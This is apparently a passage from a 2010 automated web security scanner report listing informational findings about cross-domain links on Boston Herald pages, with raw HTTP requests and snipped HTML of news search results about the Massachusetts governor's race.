http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://twitter.com/bostonherald
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /projects/your_tax_dollars.bg?src=Mwra HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 02:50:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 26780

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   
...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>

   <link rel="alternate" title=" - - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fprojects%2Fyour_tax_dollars.bg%3Fsrc%3DMwra&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<input type="button" value="Go" onClick="PayrollTable.setPageNumber(1);PayrollTable.getRows();"> <img id="ajax-loader" style="position: relative; top: 2px; display: none;" src="http://cache.heraldinteractive.com/images/siteImages/icons/ajax-loader.gif" />
<a id="clear_results" href="javascript: void(0);" onclick="PayrollTable.initialize();" style="display: none;" >
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<br/>
        No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

8.39. http://bostonherald.com/search/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/search/

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/search/?topic=Tim+Cahill&position=0

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsearch%2F%3Ftopic%3DTim%2BCahill%26position%3D0&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPoll.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniSidebar.gif
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/search/
http://multimedia.heraldinteractive.com/images/20101024/stp/a94567_baker_10252010.jpg
http://multimedia.heraldinteractive.com/images/20101025/stp/30a405_shaq_10262010.jpg
http://multimedia.heraldinteractive.com/images/20101025/stp/4777b7_debate_10252010.jpg
http://multimedia.heraldinteractive.com/images/20101025/stp/c1c80f_debate_10262010.jpg
http://multimedia.heraldinteractive.com/images/20101026/stp/07fb42_immi_10272010.jpg
http://multimedia.heraldinteractive.com/images/20101026/stp/2a99db_rallen10262010.jpg
http://multimedia.heraldinteractive.com/images/20101026/stp/5f43ba_cahil.jpg
http://multimedia.heraldinteractive.com/images/20101027/stp/dac5aa_ltpEMS102710.jpg
http://multimedia.heraldinteractive.com/images/20101028/stp/71f081_Baker_10292010.jpg
http://multimedia.heraldinteractive.com/images/20101028/stp/a5e013_Waste_Deep_315x275.jpg
http://multimedia.heraldinteractive.com/images/20101029/stp/1c2119_ltpPatrick_Baker102910.jpg
http://multimedia.heraldinteractive.com/images/20101029/stp/bb9c86_baker_10302010.jpg
http://multimedia.heraldinteractive.com/images/20101030/stp/ef0448_Cahill_10312010.jpg
http://multimedia.heraldinteractive.com/images/20101031/stp/243457_cahill_11012010.jpg
http://multimedia.heraldinteractive.com/images/20101031/stp/6a9d95_charlie_11012010.jpg
http://multimedia.heraldinteractive.com/images/20101031/stp/8226c1_poli_07052010.jpg
http://multimedia.heraldinteractive.com/images/20101101/stp/956f63_immigration_11022010.jpg
http://multimedia.heraldinteractive.com/images/20101101/stp/a0a9e3_woes_11022010.jpg
http://multimedia.heraldinteractive.com/images/20101101/stp/ccc224_diane_11022010.jpg
http://multimedia.heraldinteractive.com/images/20101101/stp/ccf253_keating_1102010.jpg
http://multimedia.heraldinteractive.com/images/20101102/stp/1930a8_ltpBakervotes110210.jpg
http://multimedia.heraldinteractive.com/images/20101102/stp/500029_ltpBaker_Patrick110210.jpg
http://multimedia.heraldinteractive.com/images/20101102/stp/56e425_Cahill_11032010.jpg
http://multimedia.heraldinteractive.com/images/20101103/stp/69989f_deval_11042010.jpg
http://multimedia.heraldinteractive.com/images/20101103/stp/758b30_cahill_11042010.jpg
http://multimedia.heraldinteractive.com/images/20101103/stp/d3913a_martha_11042010.jpg
http://multimedia.heraldinteractive.com/images/20101103/stp/ff81b1_Dev_11032010.jpg
http://multimedia.heraldinteractive.com/images/20101104/stp/1536f2_Cahill_10022010.jpg
http://multimedia.heraldinteractive.com/images/20101104/stp/8adc0e_Baker_09162010.JPG
http://multimedia.heraldinteractive.com/images/20101107/fb307e_110610cahillfn03.JPG
http://multimedia.heraldinteractive.com/images/20101107/stp/fb307e_110610cahillfn03.JPG
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://twitter.com/bostonherald
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /search/?topic=Tim+Cahill&position=0 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 03:07:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 81328

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   
...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>

   <link rel="alternate" title="Site Search - - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/search/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsearch%2F%3Ftopic%3DTim%2BCahill%26position%3D0&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20101107/stp/fb307e_110610cahillfn03.JPG" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1294589&format=comments">
...[SNIP]...
</a>  

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniSidebar.gif" alt="More Information" style="margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1294589">
...[SNIP]...
</a>  
<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPoll.gif" alt="Poll" style="margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1294589">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/opinion/editorials/view.bg?articleid=1294359&format=comments">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/opinion/letters/view.bg?articleid=1294135&format=comments">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20101104/stp/8adc0e_Baker_09162010.JPG" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1294153&format=comments">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/opinion/letters/view.bg?articleid=1293879&format=comments">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/opinion/letters/view.bg?articleid=1293881&format=comments">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20101104/stp/1536f2_Cahill_10022010.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1294115&format=comments">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1293913&format=comments">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20101103/stp/758b30_cahill_11042010.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/columnists/view.bg?articleid=1293891&format=comments">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20101103/stp/d3913a_martha_11042010.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1293884&format=comments">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20101103/stp/69989f_deval_11042010.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1293904&format=comments">
...[SNIP]...
</a>  

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniSidebar.gif" alt="More Information" style="margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1293904">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1293890&format=comments">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20101102/stp/56e425_Cahill_11032010.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1293472&format=comments">
...[SNIP]...
</a>  

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery" style="margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1293472">
...[SNIP]...
<a id="trackMainImage_href" href="/news/politics/view.bg?articleid=1294589">
<img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20101107/fb307e_110610cahillfn03.JPG" title="Independent Tim Cahill, at home in Quincy, says the negative GOP ad blitz actually helped Democrat Deval Patrick prevail in the race for governor." alt="Independent Tim Cahill, at home in Quincy, says the negative GOP ad blitz actually helped Democrat Deval Patrick prevail in the race for governor.">
</a>
...[SNIP]...
articleid=1294589" title="Tim Cahill: Attacks ‘backfired’"
onclick="switchPhoto('185393');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="185393" src="http://multimedia.heraldinteractive.com/images/20101107/stp/fb307e_110610cahillfn03.JPG" title="Independent Tim Cahill, at home in Quincy, says the negative GOP ad blitz actually helped Democrat Deval Patrick prevail in the race for governor."
alt="Faith Ninivaggi" style="margin:0 2px" />
</a>
...[SNIP]...
4153" title="Charlie Baker expresses regret, disappointment in e-mail"
onclick="switchPhoto('185052');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="185052" src="http://multimedia.heraldinteractive.com/images/20101104/stp/8adc0e_Baker_09162010.JPG" title="Charlie Baker"
alt="Herald file" style="margin:0 2px" />
</a>
...[SNIP]...
1294115" title="Tim Cahill, former aides quietly settle sabotage suit"
onclick="switchPhoto('185047');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="185047" src="http://multimedia.heraldinteractive.com/images/20101104/stp/1536f2_Cahill_10022010.jpg" title="Tim Cahill"
alt="Herald file" style="margin:0 2px" />
</a>
...[SNIP]...
w.bg?articleid=1293904" title="Deval Patrick: I’m no lame duck!"
onclick="switchPhoto('184829');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="184829" src="http://multimedia.heraldinteractive.com/images/20101103/stp/69989f_deval_11042010.jpg" title="BACK AND READY TO WORK: Gov. Deval Patrick is treated to a rousing welcome as he enters his office at the State House yesterday. Patrick said that even though he will not seek a third term, he will press his agenda."
alt="Ted Fitzgerald" style="margin:0 2px" />
</a>
...[SNIP]...
=1293891" title="Hey, Tim Cahill, thanks so much! Love, Deval Patrick"
onclick="switchPhoto('184823');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="184823" src="http://multimedia.heraldinteractive.com/images/20101103/stp/758b30_cahill_11042010.jpg" title=" Tim Cahill"
alt="Faith Ninivaggi" style="margin:0 2px" />
</a>
...[SNIP]...
s/politics/view.bg?articleid=1293884" title="Bay State: How we voted"
onclick="switchPhoto('184820');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="184820" src="http://multimedia.heraldinteractive.com/images/20101103/stp/d3913a_martha_11042010.jpg" title="TRIUMPHANT: Attorney General Martha Coakley raises her hand in victory on Election Day."
alt="John Wilcox" style="margin:0 2px" />
</a>
...[SNIP]...
93472" title="Independent Tim Cahill: ‘I have no regrets’"
onclick="switchPhoto('184646');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="184646" src="http://multimedia.heraldinteractive.com/images/20101102/stp/56e425_Cahill_11032010.jpg" title="ALL IN THE FAMILY: Gubernatorial candidate Tim Cahill greets voters with his daughters Nicole, left, and Kendra outside Holy Name Parish Hall yesterday."
alt="Ted Fitzgerald" style="margin:0 2px" />
</a>
...[SNIP]...
eid=1293459" title="Gov. Deval Patrick cooks up win vs. Charlie Baker"
onclick="switchPhoto('184704');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="184704" src="http://multimedia.heraldinteractive.com/images/20101103/stp/ff81b1_Dev_11032010.jpg" title="‘BACK TO WORK:’ Governor Deval Patrick delivers his victory speech at the Park Plaza Hotel last night after defeating GOP challenger Charlie Baker."
alt="John Wilcox" style="margin:0 2px" />
</a>
...[SNIP]...
cs/view.bg?articleid=1293233" title="Family ties all the gov hopefuls"
onclick="switchPhoto('184412');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="184412" src="http://multimedia.heraldinteractive.com/images/20101101/stp/ccc224_diane_11022010.jpg" title="WOMEN BY THEIR SIDE: Gov. Patrick stands with his wife Diane."
alt="Herald file" style="margin:0 2px" />
</a>
...[SNIP]...
cs/view.bg?articleid=1293230" title="Both sides hope for a perfect 10"
onclick="switchPhoto('184411');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="184411" src="http://multimedia.heraldinteractive.com/images/20101101/stp/ccf253_keating_1102010.jpg" title="Vice President Joe Biden stumps for William Keating at the Tirrell Room in Quincy."
alt="Kelvin Ma" style="margin:0 2px" />
</a>
...[SNIP]...
/politics/view.bg?articleid=1293227" title="What you need to vote ..."
onclick="switchPhoto('184504');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="184504" src="http://multimedia.heraldinteractive.com/images/20101102/stp/1930a8_ltpBakervotes110210.jpg" title="Gubernatorial candidate Charlie Baker, left, votes at the First Congregational Church of Swampscott this morning."
alt="Nancy Lane" style="margin:0 2px" />
</a>
...[SNIP]...
litics/view.bg?articleid=1293215" title="Illegals debate comes to Hub"
onclick="switchPhoto('184401');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="184401" src="http://multimedia.heraldinteractive.com/images/20101101/stp/956f63_immigration_11022010.jpg" title="Arizona Gov. Jan Brewer (left) speaks at a news conference at a U.S. Circuit Court of Appeals building with attorney John Bouma (right) and Governor’s office counsel Joe Kanefield (rear)."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
litics/view.bg?articleid=1293213" title="Camps fighting to the finish"
onclick="switchPhoto('184495');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="184495" src="http://multimedia.heraldinteractive.com/images/20101102/stp/500029_ltpBaker_Patrick110210.jpg" title="Gubernatorial candidate Charlie Baker votes at the First Congregational Church of Swampscott this morning while Governor Deval Patrick votes at St. Mary of the Hills School in Milton."
alt="Nancy Lane, left, Matt Stone" style="margin:0 2px" />
</a>
...[SNIP]...
ess/general/view.bg?articleid=1293205" title="Job woes loom over vote"
onclick="switchPhoto('184391');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="184391" src="http://multimedia.heraldinteractive.com/images/20101101/stp/a0a9e3_woes_11022010.jpg" title="Gov. Deval Patrick, left, touts Mass. gains, Charlie Baker, right, looks to its losses."
alt="Herald file" style="margin:0 2px" />
</a>
...[SNIP]...
ws/politics/view.bg?articleid=1292971" title="Monday Morning Briefing"
onclick="switchPhoto('184248');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="184248" src="http://multimedia.heraldinteractive.com/images/20101031/stp/8226c1_poli_07052010.jpg" title=""
alt="" style="margin:0 2px" />
</a>
...[SNIP]...
1292951" title="Brokers’ bucks boost Charlie Baker for governor"
onclick="switchPhoto('184238');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="184238" src="http://multimedia.heraldinteractive.com/images/20101031/stp/6a9d95_charlie_11012010.jpg" title="GOP gubernatorial candidate Charlie Baker."
alt="Ted Fitzgerald (file)" style="margin:0 2px" />
</a>
...[SNIP]...
ics/view.bg?articleid=1292946" title="Outside cash floods Mass. races"
onclick="switchPhoto('184234');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="184234" src="http://multimedia.heraldinteractive.com/images/20101031/stp/243457_cahill_11012010.jpg" title="MAN OF THE PEOPLE: Independent gubernatorial candidate Tim Cahill talks with Kevin Bonia outside a Dunkin’ Donuts shop in East Boston yesterday."
alt="Faith Ninivaggi" style="margin:0 2px" />
</a>
...[SNIP]...
?articleid=1292721" title="Tim Cahill holds head high on Election Day"
onclick="switchPhoto('184088');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="184088" src="http://multimedia.heraldinteractive.com/images/20101030/stp/ef0448_Cahill_10312010.jpg" title="Gubernatorial candidate Tim Cahill campaigns outside Wilson Farms in Lexington Saturday."
alt="Ryan T. Conaty" style="margin:0 2px" />
</a>
...[SNIP]...
92503" title="Charlie Baker taps Scott Brown to add mojo in dead heat"
onclick="switchPhoto('183875');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="183875" src="http://multimedia.heraldinteractive.com/images/20101029/stp/bb9c86_baker_10302010.jpg" title="CAN’T PASS HIM! Gubernatorial hopeful Charlie Baker hugs Mary Nicholson of Dedham at South Station."
alt="Stuart Cahill" style="margin:0 2px" />
</a>
...[SNIP]...
ticleid=1292413" title="Governor’s race a dead heat, poll shows"
onclick="switchPhoto('183844');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="183844" src="http://multimedia.heraldinteractive.com/images/20101029/stp/1c2119_ltpPatrick_Baker102910.jpg" title="A Rasmussen Reports telephone survey out this morning states Gov. Deval Patrick, (above, left,) ahead with 46% support, while GOP challenger Charlie Baker is closing fast with 44% of the vote."
alt="Chitose Suzuki, left, Matthew West" style="margin:0 2px" />
</a>
...[SNIP]...
?articleid=1292311" title="Ethics board costs fortune yet does little"
onclick="switchPhoto('183754');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="183754" src="http://multimedia.heraldinteractive.com/images/20101028/stp/a5e013_Waste_Deep_315x275.jpg" title=""
alt="Staff graphic" style="margin:0 2px" />
</a>
...[SNIP]...
.bg?articleid=1292310" title="Charlie Baker’s camp buckles down"
onclick="switchPhoto('183753');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="183753" src="http://multimedia.heraldinteractive.com/images/20101028/stp/71f081_Baker_10292010.jpg" title="
GOOD SIGNS: Charlie Baker, the GOP candidate for governor, meets with media at LoPresti Park in East Boston yesterday with his wife, Lauren, by his side."
alt="Ted Fitzgerald" style="margin:0 2px" />
</a>
...[SNIP]...
